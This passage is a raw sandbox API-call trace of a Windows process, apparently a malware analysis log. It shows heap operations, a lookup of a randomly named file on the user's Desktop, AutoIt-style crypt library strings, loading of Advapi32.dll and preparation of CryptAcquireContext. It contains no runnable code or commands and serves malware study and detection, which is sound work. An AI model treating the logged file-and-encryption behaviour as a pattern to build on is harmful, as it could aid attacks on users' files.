[0184.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0184.990] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/i48aq9pLiKOVw_egcT3.mp3", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ae39040, ftCreationTime.dwHighDateTime=0x1d5e846, ftLastAccessTime.dwLowDateTime=0xfce5a730, ftLastAccessTime.dwHighDateTime=0x1d5e795, ftLastWriteTime.dwLowDateTime=0xfce5a730, ftLastWriteTime.dwHighDateTime=0x1d5e795, nFileSizeHigh=0x0, nFileSizeLow=0xe879, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="i48aq9pLiKOVw_egcT3.mp3", cAlternateFileName="I48AQ9~1.MP3")) returned 0xa87310 [0184.990] FindClose (in: hFindFile=0xa87310 | out: hFindFile=0xa87310) returned 1 [0184.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0184.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0184.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0184.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0184.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0184.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0184.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0184.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0184.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0184.991] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0184.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0184.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0184.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0184.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0184.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0184.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0184.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0184.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0184.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0184.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0184.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0184.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0184.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0184.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0184.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0184.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0184.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0184.992] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0184.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0184.992] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0184.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0184.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0184.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0185.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0185.033] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0185.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0185.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0185.033] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0185.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0185.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0185.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0185.033] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0185.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0185.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0185.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0185.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0185.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0185.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0185.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0185.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0185.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0185.034] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0185.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0185.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0185.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0185.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0185.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0185.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0185.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0185.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0185.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0185.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0185.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0185.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0185.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0185.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0185.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0185.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0185.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0185.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0185.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0185.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0185.035] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0185.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0185.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0185.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0185.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0185.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0185.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0185.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0185.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0185.035] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0185.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0185.035] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0185.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0185.035] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0185.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0185.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0185.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0185.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b68 [0185.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0185.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0185.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0185.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0185.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0185.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0185.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0185.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0185.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0185.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0185.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0185.036] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0185.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0185.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0185.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.036] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0185.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0185.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0185.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0185.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0185.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0185.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0185.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0185.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0185.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0185.037] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0185.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0185.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0185.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0185.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0185.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0185.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0185.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0185.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0185.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0185.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0185.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0185.037] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0185.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0185.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0185.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0185.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0185.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0185.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0185.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0185.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0185.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0185.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0185.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0185.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0185.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0185.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0185.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.038] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0185.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0185.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0185.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0185.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0185.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0185.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0185.038] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.038] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0185.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.039] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0185.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0185.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0185.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0185.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0185.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0185.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0185.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0185.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0185.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.040] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0185.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0185.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0185.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69bc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0185.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) 